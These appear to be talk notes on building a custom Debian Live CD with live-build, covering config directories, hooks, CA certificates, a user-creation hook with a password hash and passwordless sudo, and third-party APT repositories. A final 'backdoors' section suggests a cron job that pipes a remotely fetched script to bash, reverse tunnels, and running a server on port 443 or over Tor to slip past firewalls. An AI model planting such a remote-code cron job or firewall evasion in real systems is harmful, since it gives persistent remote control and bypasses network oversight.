wtf would you want to do that

Fucking capslock
All the tools I need preinstalled
.bashrc, .emacs, etc.
Make a dropbox out of anything that can boot from CD.

Debian Live overview

Real documentation is at http://live.debian.net/ - this is just an overview.

```
# mkdir livecd; cd livecd
```
```
# lb config
```
```
# lb build
```

This results in a directory tree like this:

# ls -1F
auto/
binary/
binary-hybrid.iso
binary.list
binary.packages
build.log
cache/
chroot/
chroot.packages.install
chroot.packages.live
config/

binary is the livecd filesystem containing e.g. the syslinux bootloader and the squashfs with your livecd chroot on it.
binary-hybrid.iso is the resulting isofile that you can burn to disc or copy with dd to a USB drive.
chroot will become / when you boot into your livecd.
cache is a temporary directory that contains stuff like downloaded packages. (If you're not doing anything too complicated, it can be useful to symlink cache/packages_chroot to

Debian Live configuration

And the config directory is where you'll spend most of your time:

# ls -1F config
archives/
binary
binary_debian-installer/
binary_debian-installer-includes/
binary_grub/
binary_rootfs/
binary_syslinux/
bootstrap
chroot
chroot_apt/
chroot_local-patches/
common
hooks/
includes/
includes.binary/
includes.chroot/
package-lists/
packages/
packages.binary/
packages.chroot/
preseed/
source
task-lists/
templates/

Customization

Files from config/includes.chroot are copied directly into the livecd filesystem.
Files in config/hooks/*.<STAGE> are executed at <STAGE>, where stages include at least chroot and binary.
config/includes.chroot/etc/rc.local is a good catch-all for stuff that needs to be run at each boot as well.
config/packages.chroot should contain a list of packages you wish to install.

In my rc.local I run a script that updates the git repository containing my bashrc and other dotfiles.
Capslock is control: config/includes.chroot/etc/default/keyboard (details in man 5 keyboard)

Customization: custom CA certificate

Make sure you install the ca-certificates package (in the livecd).
Add your custom certificate to config/includes.chroot/usr/local/share/ca-certificates/.
Create a chroot hook to run update-ca-certificates -f.

Customization: add a user

I have a users.chroot hook that does this for me.

password='$6$Ww6QA/nwY$7ngMEfWsOMoApkBXY1itmxQWDSFYjZpgIR1tl8M1xiBHOGHtiy1TxkTxcZVC1tw6lz4QrDMwwgUn9llxYAtkK/'
groupadd --gid 999 jessica
groupadd --gid 998 basicallyroot
umask 077

useradd --home-dir /home/jessica \
    --create-home \
    --skel /etc/skel-jessica \
    --shell /bin/bash \
    --uid 999 \
    --no-user-group \
    --gid 999 \
    --groups sudo,basicallyroot \
    --password "$password" \
    jessica

chmod 700 ~jessica

su jessica -c 'cd ~; umask 077; git clone https://younix.us/cgit/cgit.cgi/dhd.git/ .dhd'
su jessica -c 'git config remote.origin.url mrled@h.younix.us:~/opt/rcs/dhd.git'

echo "%basicallyroot   ALL=NOPASSWD: ALL" > /etc/sudoers.d/basicallyroot
chmod 440 /etc/sudoers.d/basicallyroot

Doing it in a hook is more robust than copying /etc/{passwd,shadow,group,...} into config/includes.chroot because if for example you add a package that creates its own user, this way you wont overwrite it.
You can generate the hashed and salted password with
```
echo password | mkpasswd --method=sha-512 --stdin
```
Note that I use a custom skel directory for this user. This is a hack to deal with some permissions problems I was having... useradd handles setting permissions for me.
I use git to store my dotfiles (bashrc and such). Here I'm pulling from a read-only https:// git URL, which means the livecd doesn't have to contain a passwordless ssh key to my git repository host (which contains sensitive information). I also have my rc.local file (not shown) pull from the same https git URL into this repository, which means that if I have Internet access at boot time, my dotfiles are totally up to date.

Customization: third party APT repositories

Adding them without Secure APT (GPG-signed packages): add them to config/archives/<NAME>.list.{binary,chroot}. Easy but insecure.

Adding them with Secure APT: You must do it manually in a chroot hook so that you can also grab the GPG keys. For example, to add Clonezilla's repository:

echo "deb http://free.nchc.org.tw/drbl-core drbl testing" \ 
  > /etc/apt/sources.list.d/clonezilla.list
gpg --keyserver keys.gnupg.net --recv 40009511D7E8DF3A
gpg --export 40009511D7E8DF3A | apt-key add -
apt-get update
apt-get --yes install clonezilla

I have Tor and Clonezilla on mine. This is also how you'd add LaunchPad PPA repositories (using this information). (Note that installing PPAs on Debian isn't recommended but it can be useful anyway.)
You have to run apt-get update; apt-get --yes install <PACKAGE> yourself, because chroot hooks like this one run after the packages from your package list get installed.

Customization: backdoors and reverse connections

Remote access behind a firewall.

Add a cronjob inside config/include.chroot/etc/cron.d/ with something like
```
curl https://you.example.com/rcode.sh | bash
```
VPN software: OpenVPN etc.
SSH reverse tunnels possible, but limited to one remote host at a time.
Consider running your server on port 443 or over Tor to evade restrictive firewalls.

Building a livecd with Debian Live